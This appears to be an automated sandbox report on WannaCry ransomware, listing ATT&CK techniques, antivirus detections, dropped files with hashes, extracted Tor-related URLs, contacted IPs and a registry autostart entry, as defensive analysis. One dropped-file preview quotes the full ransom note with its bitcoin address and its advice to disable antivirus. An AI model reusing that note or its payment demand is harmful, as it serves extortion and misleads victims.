                  Services File Permissions Weakness
                  11
                  Process Injection
                  1
                  DLL Side-Loading
                  Security Account Manager3
                  File and Directory Discovery
                  SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration2
                  Multi-hop Proxy
                  Exploit SS7 to Track Device LocationObtain Device Cloud Backups1
                  Defacement
                  Local AccountsAt (Windows)Logon Script (Mac)1
                  Registry Run Keys / Startup Folder
                  1
                  File Deletion
                  NTDS23
                  System Information Discovery
                  Distributed Component Object ModelInput CaptureScheduled Transfer1
                  Application Layer Protocol
                  SIM Card SwapCarrier Billing Fraud
                  Cloud AccountsCronNetwork Logon Script1
                  Services File Permissions Weakness
                  111
                  Masquerading
                  LSA Secrets21
                  Security Software Discovery
                  SSHKeyloggingData Transfer Size Limits2
                  Proxy
                  Manipulate Device CommunicationManipulate App Store Rankings or Ratings
                  Replication Through Removable MediaLaunchdRc.commonRc.common1
                  Virtualization/Sandbox Evasion
                  Cached Domain Credentials1
                  Virtualization/Sandbox Evasion
                  VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                  External Remote ServicesScheduled TaskStartup ItemsStartup Items1
                  Modify Registry
                  DCSync1
                  Process Discovery
                  Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                  Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job1
                  Access Token Manipulation
                  Proc Filesystem1
                  Application Window Discovery
                  Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                  Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)11
                  Process Injection
                  /etc/passwd and /etc/shadow1
                  System Owner/User Discovery
                  Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
                  Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)1
                  Hidden Files and Directories
                  Network SniffingProcess DiscoveryTaint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact
                  Compromise Software Dependencies and Development ToolsWindows Command ShellCronCron1
                  Services File Permissions Weakness
                  Input CapturePermission Groups DiscoveryReplication Through Removable MediaRemote Data StagingExfiltration Over Physical MediumMail ProtocolsService Stop
                  Behavior graph: Behavior Graph ID: 866427, Sample: WannaCry.cmd, Startdate: 15/05/2023, Architecture: WINDOWS, Score: 100

                  Source | Detection | Scanner | Label
                  WannaCry.cmd | 25% | Virustotal |
                  WannaCry.cmd | 11% | ReversingLabs | Win32.Trojan.Generic

                  Source | Detection | Scanner | Label
                  C:\@WanaDecryptor@.exe | 100% | Avira | LNK/Runner.VPDJ
                  C:\ProgramData\Intel\GCC\@WanaDecryptor@.exe.lnk | 100% | Avira | LNK/Runner.VPDJ
                  C:\@WanaDecryptor@.exe | 100% | Avira | TR/FileCoder.724645
                  C:\@WanaDecryptor@.exe | 100% | Joe Sandbox ML |
                  C:\@WanaDecryptor@.exe | 96% | ReversingLabs | Win32.Ransomware.WannaCry
                  C:\Users\user\AppData\Local\@WanaDecryptor@.exe | 96% | ReversingLabs | Win32.Ransomware.WannaCry
                  C:\Users\user\Desktop\@WanaDecryptor@.exe | 96% | ReversingLabs | Win32.Ransomware.WannaCry
                  C:\Users\user\Desktop\TaskData\Tor\libeay32.dll | 0% | ReversingLabs |
                  C:\Users\user\Desktop\TaskData\Tor\libevent-2-0-5.dll | 0% | ReversingLabs |
                  C:\Users\user\Desktop\TaskData\Tor\libevent_core-2-0-5.dll | 0% | ReversingLabs |
                  C:\Users\user\Desktop\TaskData\Tor\libevent_extra-2-0-5.dll | 0% | ReversingLabs |
                  C:\Users\user\Desktop\TaskData\Tor\libgcc_s_sjlj-1.dll | 0% | ReversingLabs |
                  C:\Users\user\Desktop\TaskData\Tor\libssp-0.dll | 0% | ReversingLabs |
                  C:\Users\user\Desktop\TaskData\Tor\ssleay32.dll | 0% | ReversingLabs |
                  C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exe | 0% | ReversingLabs |
                  C:\Users\user\Desktop\TaskData\Tor\tor.exe | 0% | ReversingLabs |
                  C:\Users\user\Desktop\TaskData\Tor\zlib1.dll | 0% | ReversingLabs |
                  C:\Users\user\Desktop\WannaCrypt0r.sk | 94% | ReversingLabs | Win32.Ransomware.WannaCry
                  C:\Users\user\Desktop\taskdl.exe | 89% | ReversingLabs | Win32.Ransomware.WannaCry
                  C:\Users\user\Desktop\taskse.exe | 89% | ReversingLabs | Win32.Ransomware.WannaCry
                  C:\Users\user\Desktop\u.wnry | 96% | ReversingLabs | Win32.Ransomware.WannaCry
                  C:\Users\user\Documents\@WanaDecryptor@.exe | 96% | ReversingLabs | Win32.Ransomware.WannaCry
                  C:\Users\user\Downloads\@WanaDecryptor@.exe | 96% | ReversingLabs | Win32.Ransomware.WannaCry
                  C:\Users\Default\Desktop\@WanaDecryptor@.exe | 96% | ReversingLabs | Win32.Ransomware.WannaCry
                  C:\Users\Public\Desktop\@WanaDecryptor@.exe | 96% | ReversingLabs | Win32.Ransomware.WannaCry
                  No Antivirus matches
                  Source | Detection | Scanner | Label
                  http://www.btcfrog.com/qr/bitcoinPNG.php?address=%smailto:%shttps://www.google.com/search?q=how | 0% | Avira URL Cloud | safe
                  http://freehaven.net/anonbib/#hs-attack06 | 0% | Avira URL Cloud | safe
                  https://386bsd.net | 0% | Avira URL Cloud | safe
                  http://www.btcfrog.com/qr/bitcoinPNG.php?address=%s | 0% | Avira URL Cloud | safe
                  http://www.btcfrog.com/qr/bitcoinPNG.php?address=%smailto:%shttps://www.google.com/search?q=how | 0% | Virustotal |
                  https://386bsd.net | 0% | Virustotal |
                  http://freehaven.net/anonbib/#hs-attack06 | 0% | Virustotal |
                  http://www.btcfrog.com/qr/bitcoinPNG.php?address=%s | 0% | Virustotal |
                  No contacted domains info
                  Name | Source | Malicious | Antivirus Detection | Reputation
                  http://www.btcfrog.com/qr/bitcoinPNG.php?address=%s | @WanaDecryptor@.exe | true | 0%, Virustotal; Avira URL Cloud: safe | unknown
                  https://wiki.torproject.org/TheOnionRouter/TorFAQ#SOCKSAndDNS.%s | taskhsvc.exe, 0000001D.00000000.4371285563.000000000081C000.00000002.00000001.01000000.0000000A.sdmp | false | | high
                  https://blog.torproject.org/blog/lifecycle-of-a-new-relayError | @WanaDecryptor@.exe, 00000019.00000003.4365502561.000000000289A000.00000004.00000020.00020000.00000000.sdmp, taskhsvc.exe, 0000001D.00000000.4371285563.000000000081C000.00000002.00000001.01000000.0000000A.sdmp | false | | high
                  https://www.google.com/search?q=how | @WanaDecryptor@.exe | false | | high
                  https://www.torproject.org/download/download#warningalphabetaThis | taskhsvc.exe, 0000001D.00000000.4371285563.000000000081C000.00000002.00000001.01000000.0000000A.sdmp | false | | high
                  http://www.btcfrog.com/qr/bitcoinPNG.php?address=%smailto:%shttps://www.google.com/search?q=how | WannaCrypt0r.sk, 00000005.00000003.4342275921.00000000008AC000.00000004.00000020.00020000.00000000.sdmp, WannaCrypt0r.sk, 00000005.00000003.3016294775.0000000000870000.00000004.00000020.00020000.00000000.sdmp, WannaCrypt0r.sk, 00000005.00000003.3030888426.0000000000876000.00000004.00000020.00020000.00000000.sdmp, WannaCrypt0r.sk, 00000005.00000003.3370890950.00000000008A3000.00000004.00000020.00020000.00000000.sdmp, WannaCrypt0r.sk, 00000005.00000003.3037184208.000000000087B000.00000004.00000020.00020000.00000000.sdmp, @WanaDecryptor@.exe, 00000019.00000000.4343624168.000000000041F000.00000008.00000001.01000000.00000009.sdmp, @WanaDecryptor@.exe, 00000019.00000002.7375280551.0000000000421000.00000004.00000001.01000000.00000009.sdmp, @WanaDecryptor@.exe, 0000001C.00000002.4450693015.0000000000421000.00000004.00000001.01000000.00000009.sdmp, @WanaDecryptor@.exe, 0000001C.00000000.4347439754.000000000041F000.00000008.00000001.01000000.00000009.sdmp | true | 0%, Virustotal; Avira URL Cloud: safe | unknown
                  http://www.zlib.net/D | @WanaDecryptor@.exe, 00000019.00000003.4365094465.0000000002791000.00000004.00000020.00020000.00000000.sdmp, @WanaDecryptor@.exe, 00000019.00000003.4365358395.0000000002798000.00000004.00000020.00020000.00000000.sdmp | false | | high
                  https://wiki.torproject.org/TheOnionRouter/TorFAQ#SOCKSAndDNS.%sDANGEROUS_SOCKS | taskhsvc.exe, 0000001D.00000000.4371285563.000000000081C000.00000002.00000001.01000000.0000000A.sdmp | false | | high
                  https://www.torproject.org/documentation.html | taskhsvc.exe, 0000001D.00000000.4371285563.000000000081C000.00000002.00000001.01000000.0000000A.sdmp | false | | high
                  https://386bsd.net | taskhsvc.exe, 0000001D.00000003.4413396862.0000000003710000.00000004.00000020.00020000.00000000.sdmp | false | 0%, Virustotal; Avira URL Cloud: safe | unknown
                  https://www.torproject.org/download/download#warning | taskhsvc.exe, 0000001D.00000000.4371285563.000000000081C000.00000002.00000001.01000000.0000000A.sdmp | false | | high
                  https://dist.torproject.org/torbrowser/6.5.1/tor-win32-0.2.9.10.zip$ | @WanaDecryptor@.exe, 00000019.00000002.7374394237.0000000000198000.00000004.00000010.00020000.00000000.sdmp, @WanaDecryptor@.exe, 0000001C.00000002.4450175484.000000000019B000.00000004.00000010.00020000.00000000.sdmp | false | | high
                  https://www.torproject.org/ | taskhsvc.exe, 0000001D.00000000.4371285563.000000000081C000.00000002.00000001.01000000.0000000A.sdmp | false | | high
                  https://trac.torproject.org/8742 | taskhsvc.exe, 0000001D.00000000.4371285563.000000000081C000.00000002.00000001.01000000.0000000A.sdmp | false | | high
                  http://freehaven.net/anonbib/#hs-attack06 | taskhsvc.exe, 0000001D.00000000.4371285563.000000000081C000.00000002.00000001.01000000.0000000A.sdmp | false | 0%, Virustotal; Avira URL Cloud: safe | unknown
                                        https://www.torproject.org/docs/faq.html#BestOSForRelaytaskhsvc.exe, 0000001D.00000000.4371285563.000000000081C000.00000002.00000001.01000000.0000000A.sdmpfalse
                                          high
                                          https://dist.torproject.org/torbrowser/6.5.1/tor-win32-0.2.9.10.zip@WanaDecryptor@.exefalse
                                            high
                                            https://blog.torproject.org/blog/lifecycle-of-a-new-relay@WanaDecryptor@.exe, 00000019.00000003.4365502561.000000000289A000.00000004.00000020.00020000.00000000.sdmp, taskhsvc.exe, 0000001D.00000000.4371285563.000000000081C000.00000002.00000001.01000000.0000000A.sdmpfalse
                                              high
                                              https://dist.torproject.org/torbrowser/6.5.1/tor-win32-0.2.9.10.zip8B@WanaDecryptor@.exe, 00000019.00000002.7375280551.0000000000421000.00000004.00000001.01000000.00000009.sdmpfalse
                                                high
                                                https://trac.torproject.org/projects/tor/ticket/14917.taskhsvc.exe, 0000001D.00000000.4371285563.000000000081C000.00000002.00000001.01000000.0000000A.sdmpfalse
                                                  high
                                                  • No. of IPs < 25%
                                                  • 25% < No. of IPs < 50%
                                                  • 50% < No. of IPs < 75%
                                                  • 75% < No. of IPs
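IP: 171.25.193.9, Domain: unknown, Country: Sweden, ASN: 198093, ASN Name: DFRI-ASForeningenfordigitalafri-ochrattigheterSE, Malicious: false
IP: 163.172.53.201, Domain: unknown, Country: United Kingdom, ASN: 12876, ASN Name: OnlineSASFR, Malicious: false
IP: 5.9.158.75, Domain: unknown, Country: Germany, ASN: 24940, ASN Name: HETZNER-ASDE, Malicious: false
IP: 127.0.0.1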
                                                  Joe Sandbox Version:37.1.0 Beryl
                                                  Analysis ID:866427
                                                  Start date and time:2023-05-15 09:25:54 +02:00
                                                  Joe Sandbox Product:CloudBasic
                                                  Overall analysis duration:0h 22m 41s
                                                  Hypervisor based Inspection enabled:false
                                                  Report type:full
                                                  Cookbook file name:default.jbs
                                                  Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, IE 11, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
                                                  Number of analysed new started processes analysed:53
                                                  Number of new started drivers analysed:0
                                                  Number of existing processes analysed:0
                                                  Number of existing drivers analysed:0
                                                  Number of injected processes analysed:0
                                                  Technologies:
                                                  • HCA enabled
                                                  • EGA enabled
                                                  • HDC enabled
                                                  • AMSI enabled
                                                  Analysis Mode:default
                                                  Analysis stop reason:Timeout
                                                  Sample file name:WannaCry.cmd
                                                  Detection:MAL
                                                  Classification:mal100.rans.spyw.evad.winCMD@51/842@0/4
                                                  EGA Information:
                                                  • Successful, ratio: 100%
                                                  HDC Information:
                                                  • Successful, ratio: 99.9% (good quality ratio 74.3%)
                                                  • Quality average: 59.8%
                                                  • Quality standard deviation: 38.8%
                                                  HCA Information:
                                                  • Successful, ratio: 100%
                                                  • Number of executed functions: 87
                                                  • Number of non-executed functions: 251
                                                  Cookbook Comments:
                                                  • Found application associated with file extension: .cmd
                                                  • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                                                  • Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
                                                  • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, MoUsoCoreWorker.exe, VSSVC.exe, UsoClient.exe
                                                  • Excluded IPs from analysis (whitelisted): 40.126.32.140, 20.190.160.14, 20.190.160.17, 40.126.32.138, 40.126.32.72, 20.190.160.22, 20.190.160.20, 40.126.32.76, 209.197.3.8, 20.93.58.141, 20.82.207.122
                                                  • Excluded domains from analysis (whitelisted): wd-prod-cp-eu-north-3-fe.northeurope.cloudapp.azure.com, spclient.wg.spotify.com, client.wns.windows.com, slscr.update.microsoft.com, wd-prod-cp-eu-north-2-fe.northeurope.cloudapp.azure.com, ctldl.windowsupdate.com, cds.d2s7q6s2.hwcdn.net, wdcp.microsoft.com, wu-bg-shim.trafficmanager.net, wd-prod-cp.trafficmanager.net, login.msa.msidentity.com, www.tm.a.prd.aadg.trafficmanager.net, fe3cr.delivery.mp.microsoft.com, wdcpalt.microsoft.com, prda.aadg.msidentity.com, login.live.com, www.tm.lg.prod.aadmsa.trafficmanager.net
• Not all processes were analyzed, report is missing behavior information
                                                  • Report creation exceeded maximum time and may have missing behavior information.
                                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                                  • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                  • Report size getting too big, too many NtCreateFile calls found.
                                                  • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                  • Report size getting too big, too many NtOpenFile calls found.
                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                                  • Report size getting too big, too many NtSetInformationFile calls found.
Time: 09:31:35, Type: Autostart, Description: Run: HKLM\Software\Microsoft\Windows\CurrentVersion\Run vfwrglgamdagtoq456 "C:\Users\user\Desktop\tasksche.exe"
                                                  No context
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):933
                                                  Entropy (8bit):4.708686542546707
                                                  Encrypted:false
                                                  SSDEEP:24:ptrPzDVR5Gi3OzGm0EigS1xbnrRQhbrW8PNAi0eEprY+Ai75wRZcet:DZD36W3yhvWmMo+S
                                                  MD5:F97D2E6F8D820DBD3B66F21137DE4F09
                                                  SHA1:596799B75B5D60AA9CD45646F68E9C0BD06DF252
                                                  SHA-256:0E5ECE918132A2B1A190906E74BECB8E4CED36EEC9F9D1C70F5DA72AC4C6B92A
                                                  SHA-512:EFDA21D83464A6A32FDEEF93152FFD32A648130754FDD3635F7FF61CC1664F7FC050900F0F871B0DDD3A3846222BF62AB5DF8EED42610A76BE66FFF5F7B4C4C0
                                                  Malicious:false
                                                  Yara Hits:
                                                  • Rule: WannaCry_RansomNote, Description: Detects WannaCry Ransomware Note, Source: C:\@Please_Read_Me@.txt, Author: Florian Roth (Nextron Systems)
                                                  Reputation:unknown
                                                  Preview:Q: What's wrong with my files?....A: Ooops, your important files are encrypted. It means you will not be able to access them anymore until they are decrypted... If you follow our instructions, we guarantee that you can decrypt all your files quickly and safely!.. Let's start decrypting!....Q: What do I do?....A: First, you need to pay service fees for the decryption... Please send $300 worth of bitcoin to this bitcoin address: 115p7UMMngoj1pMvkpHijcRdfJNXj6LrLn.... Next, please find an application file named "@WanaDecryptor@.exe". It is the decrypt software... Run and follow the instructions! (You may need to disable your antivirus for a while.).. ..Q: How can I trust?....A: Don't worry about decryption... We will decrypt your files surely because nobody will trust us if we cheat users... ....* If you need our assistance, send a message by clicking <Contact Us> on the decryptor window....
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):245760
                                                  Entropy (8bit):6.278920408390635
                                                  Encrypted:false
                                                  SSDEEP:3072:Rmrhd5U1eigWcR+uiUg6p4FLlG4tlL8z+mmCeHFZjoHEo3m:REd5+IZiZhLlG4AimmCo
                                                  MD5:7BF2B57F2A205768755C07F238FB32CC
                                                  SHA1:45356A9DD616ED7161A3B9192E2F318D0AB5AD10
                                                  SHA-256:B9C5D4339809E0AD9A00D4D3DD26FDF44A32819A54ABF846BB9B560D81391C25
                                                  SHA-512:91A39E919296CB5C6ECCBA710B780519D90035175AA460EC6DBE631324E5E5753BD8D87F395B5481BCD7E1AD623B31A34382D81FAAE06BEF60EC28B49C3122A9
                                                  Malicious:true
                                                  Yara Hits:
                                                  • Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: C:\@WanaDecryptor@.exe, Author: Joe Security
                                                  • Rule: Win32_Ransomware_WannaCry, Description: unknown, Source: C:\@WanaDecryptor@.exe, Author: ReversingLabs
                                                  Antivirus:
                                                  • Antivirus: Avira, Detection: 100%
                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                  • Antivirus: ReversingLabs, Detection: 96%
                                                  Reputation:unknown
Preview:MZ [PE header, "This program cannot be run in DOS mode", sections .text, .rdata, .data, .rsrc; binary content]
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1368
                                                  Entropy (8bit):7.840995518833475
                                                  Encrypted:false
                                                  SSDEEP:24:bkF4/SW7MrB297eFxjybuhTwSiBaeG+wsuBxMp4VYFXdhNPiDIEL+Qiz9FDJQ:bkF46W7MrBO7UxjIjQX7W4+5d3PiDIEn
                                                  MD5:F9254FD251DDE5DE89A2816266A8979A
                                                  SHA1:5C79CCCDA7F5E14CF5AA9EE028E4B9BECA057193
                                                  SHA-256:BFF3A77FB5FB64351CB364F160C984818C6C040E03C3D9C757AA59EAA8FEB210
                                                  SHA-512:07E348A7BBA0ACBDDA249C103D37092E02D13B0D7E3EC716B3EF1741E24837F96A58A677932424763DF28779203B991DBAFE6F5A28607FF536F83CE90D1CC84F
                                                  Malicious:false
                                                  Reputation:unknown
Preview:WANACRY! [binary content]
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):5096
                                                  Entropy (8bit):7.964858957218272
                                                  Encrypted:false
                                                  SSDEEP:96:oDo+bbmjZPRATp+fOeV9s2wQMgV5FhiMRle/KzKJpjvwlRxDv:MWjmSOxn84YleyzQd4xDv
                                                  MD5:A125F004FE67F0883191214F1703715E
                                                  SHA1:2D686FFD7B21C0471B4198A7F987C7380AB52DD5
                                                  SHA-256:D28D3ABF00AD7EC551C55D67B108744C0BFAC9E873C5EF47AC9828FA059A087B
                                                  SHA-512:973197766551B6EE0ED9C78E97BBFA3F65AB3BC71023CECAC6E8E5B07C2DB259B4126D4A1CD7E57C2C5E42E1B48A122A0935F85A93491AF0EAFB5EC987E81644
                                                  Malicious:false
                                                  Reputation:unknown
Preview:WANACRY! [binary content]
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):5096
                                                  Entropy (8bit):7.9591959155291265
                                                  Encrypted:false
                                                  SSDEEP:96:oE0yCVXjl0ahP7O45KsUnuGryPxPjR/rjx8l7CKw1lCcV1c4qjF+m32:vHGdhP7Odry5J98h4lCcMVG
                                                  MD5:B495A26E8F1988F7950ED91A537CDAD5
                                                  SHA1:3EEF940B167652D6BC047672D926934E25CA328A
                                                  SHA-256:B0CCF1C5B84C7E2E434550B7232B3AFADFAB12BD4FF50E26B66894FE01D8A154
                                                  SHA-512:A9319283E61135F08E263B747EFD69044A45F4C1875447AC63CCDF9347CBC76C3CF2C0B1F454891C6474207E0BDD83B0FF315DB9346DD86282508B300DB8C152
                                                  Malicious:false
                                                  Reputation:unknown
Preview:WANACRY! [binary content]
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):516712
                                                  Entropy (8bit):7.9995955877153
                                                  Encrypted:true
                                                  SSDEEP:12288:WaXWduW49+v/Ek35WN33bc7uFCt3o5KF8BkRC2q70Yl1wntD:WJdP40zQN3w7u+3o548kRrdnB
                                                  MD5:839F0C5A094933ABF99406F7D518C732
                                                  SHA1:452A72A8C2CBD433ECC6E7389ECC8386A7CC95DE
                                                  SHA-256:42B8EA4FAE72B802277437FE8979FAE7737D3724CA1EA3450FA43AA133CB7461
                                                  SHA-512:116118455646D84579498D54D5A9E1F4480BA61E51B05AD14F485EE0E928E0ADFEA2A52F465E26FCB47B7AA7C0EF885E90EF728C615478B99B041774B0F80203
                                                  Malicious:true
                                                  Reputation:unknown
Preview:WANACRY! [binary content]
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):7000
                                                  Entropy (8bit):7.9749428884531035
                                                  Encrypted:false
                                                  SSDEEP:192:i4XL0DrCpeo5X7o3ACvi5T2VFL27jDuX4VakDEcYi5HdEil:nLcrFo4te5WgakA+tdL
                                                  MD5:D67377256B59EB0626833F7C24028696
                                                  SHA1:EB90AA6A2F7A0B5AA2FEEFAD93AA0C6ED8871D76
                                                  SHA-256:21CC8B780380BD9A08855182DC4BEE40FBE492669A8EB1737BCBBE33D45950D6
                                                  SHA-512:118A991464663E655094232DE025D2716B42FE42C15C1D05A1A9F1A9D5399B7569CBF8F67E7ED60371DE6783AEF0C427517BA4B99D75A382219BF4E593A2A0E6
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):7000
                                                  Entropy (8bit):7.974913211664829
                                                  Encrypted:false
                                                  SSDEEP:192:Em5wB/N0gHfSZi0kXCVviIHiNoWjpWbJnYY:xuKg/Sg0WCpTCaJnYY
                                                  MD5:809F1A2208D4617FE328F5EA8FFBD170
                                                  SHA1:D4A4C7580C857AA6AF4D6F938B98F601487329C6
                                                  SHA-256:230384FD2C517502716369F0AD2D6F9243F97F47221529DF16D7BE0F9D222D97
                                                  SHA-512:93A09572A5A78D9BF17A01A2B1B315DCD32F6FE64BDF46A979AE24AB9CB28078C402B89CF99778E0B60220A6AAE89173495D3C439E7045EF3FC25A8ABBE538D5
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):6952
                                                  Entropy (8bit):7.971712427241319
                                                  Encrypted:false
                                                  SSDEEP:192:9jv1QnC9dwNdKshSl+oy+7hBKvkPP0iTo:9jvGY6OshSlHZzZTo
                                                  MD5:C19982C11E53BC5D6097817039924AEF
                                                  SHA1:112066DE1B23DEACFE921CE4CE6A801A8F06AD26
                                                  SHA-256:CAC3FCE8B74A8E30097FC695D9F5816B2DD73FC81231CE13BA367DAFBCA24690
                                                  SHA-512:B3049A9975179A0A23E4D7205C93BCF260FE5949A1BCB9A6E83929C1652C3D046F28FB612CA6AA4476EB3274D9EF843E0C3AB77E31A80E5374B437122C36882D
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):242232
                                                  Entropy (8bit):7.99934672493712
                                                  Encrypted:true
                                                  SSDEEP:6144:HksNCvEXXCohEMSVazq+n6L9+hBVEOaVyU:HJNXrRSVaO+n6L9+h6VyU
                                                  MD5:733449179E12EC54B3EEE6C519258302
                                                  SHA1:BCC880D2C1EBC655375294A8A37DB0CF038746C4
                                                  SHA-256:099FCB2412C7CD8E7B0E4C595CEECE3BB968226ADF7DAB696E56B9E4E80839A1
                                                  SHA-512:118588FF814D6F1E4887DA166461497060AFE439F888C23FC3B6E33F16156740C2F5D26CB5F6225B7ED10F181D8DA05746105703E63D6FA756EF8C8326357DE4
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):76360
                                                  Entropy (8bit):7.997750798749787
                                                  Encrypted:true
                                                  SSDEEP:1536:LItgB3fBBDtD6NakCktxlAGA9wyuEPvOT4nvewtYozeYPV8:LItgdB/D68k/5ZEPmT4nviozef
                                                  MD5:8AC7E5A225BE5170A27ECBF89BD951AE
                                                  SHA1:59ED9E30627A096F05A890A75DA8A994B31312D0
                                                  SHA-256:01528597187765C62AAA0185AC62C52387316A37878EF5238703382DF7ED1EA7
                                                  SHA-512:5D975E70956A1E4A14599BFB46C68C75243C79C6F5DCCE78A6F5BE7AC95F9F6DC71A20F08DB3A1ECE3DBE7C1748169C145CBF5896FAC61E82C479FD8FA6A9FAB
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):4664
                                                  Entropy (8bit):7.960020895062463
                                                  Encrypted:false
                                                  SSDEEP:96:ofmq0hddugcsq3UyxEvuOw5ZfU3iGiMhJ8FvRHXaHz:2mq2d8sq3UyJOd9ihZ3aT
                                                  MD5:BFDF16B75688901DC1C4CFEFEC8CEEAC
                                                  SHA1:47CBD1085EC68533A06EC29A9451118BABC9B884
                                                  SHA-256:B3CD72E2F6AF63D744F52714676C2DF9978E5435F3EA6683C269B6FFEADF3A1F
                                                  SHA-512:A5723FB6BFD5CA65F041B31EA200659DE11FB7822AE091F96585B732B578DA29351EA75FB4C9C71DE0AE6D8635B8CDEF17BFD5BFB825395DDF6E79C2B4655D48
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):6360
                                                  Entropy (8bit):7.965787542240746
                                                  Encrypted:false
                                                  SSDEEP:96:oPfsuZdPAZgsnPDAqeKC2Mw1OLQsfEvLQu9Yj4yaLm4wczKp7ZobuxM1s9tFlG:/uvPAPUK9OMxHYjxUm4Rg1ob6MW/G
                                                  MD5:F3D17DD92BE76CD75F0FD98216E20ED4
                                                  SHA1:1DC0D331E221C1A3FCBB1C3692E17D41F120617A
                                                  SHA-256:5E12B25CC86E390E646BA805A869B2F55771F5388970E6DC1464079DCCFC3E05
                                                  SHA-512:67C730156D4F2EE235CACC77BBA8C97FF80BA8D9E38159CF40527CDE41874349A650C8D8216287EACA202D8162C27F83997A281AA757164285542F808D635920
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):6760
                                                  Entropy (8bit):7.97066902697336
                                                  Encrypted:false
                                                  SSDEEP:192:TdbKtbkUiXZY01nhkABrBMb3KBRb48fRGxK6XR:TdbKtbkjDnh39g0bH6B
                                                  MD5:8A9F7FE136D56659DF8114F2820F3422
                                                  SHA1:17B58873D5F04D2D1F05F22CA111C51BCD03ECF3
                                                  SHA-256:0462F2F6777AFEFA969600C3B7592E0C3C3CCA04156FFD956044005E47C4885F
                                                  SHA-512:E42EE216872D37E0EF99CC878B8897D57C702639BB3D42F5550006E43ED571246F725C9CA9B5E35AF9CF524037748F4FBE9DE70F8EF019587A487FC64E20816C
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):5240
                                                  Entropy (8bit):7.961258053494169
                                                  Encrypted:false
                                                  SSDEEP:96:oBobyakMyimPtQzXLN24K3+Et2hq1YZRAZ64rXw+mRBJMT4X38zNlw50HECXmzRO:Ota3/mPazXLw4Kuah6+mR7M0v8m1O
                                                  MD5:18AD25F0371920F02DCBA08876C08120
                                                  SHA1:E84645A2FEE33EDB7CFFBECA6998DAB9FCB106D9
                                                  SHA-256:14597B299943BEE110D213DDFDC16941F9142765B28B3D22A0A2475882419774
                                                  SHA-512:822090E5C18C9225E03BFC76BB61CDD84F1E3AC813EF9A6ABEEEB99171E635090122FB0399FCC2316DC339EC580FACF77AC1ED2779DA5F33C20D384647A1455C
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):9736
                                                  Entropy (8bit):7.975696490298713
                                                  Encrypted:false
                                                  SSDEEP:192:z+BNTrOq6Igzy0EJJqSxCOj9mdlz+g3joJEGJOj/mpLspiKQtlgfMg:CHTqEJdCOj9mtSW/mZs0KEqF
                                                  MD5:9590BEA7AFB5D6F2F84EB52C8CF59172
                                                  SHA1:AB20957A1FEE44E3F88336A6288D0FEAFDF78A79
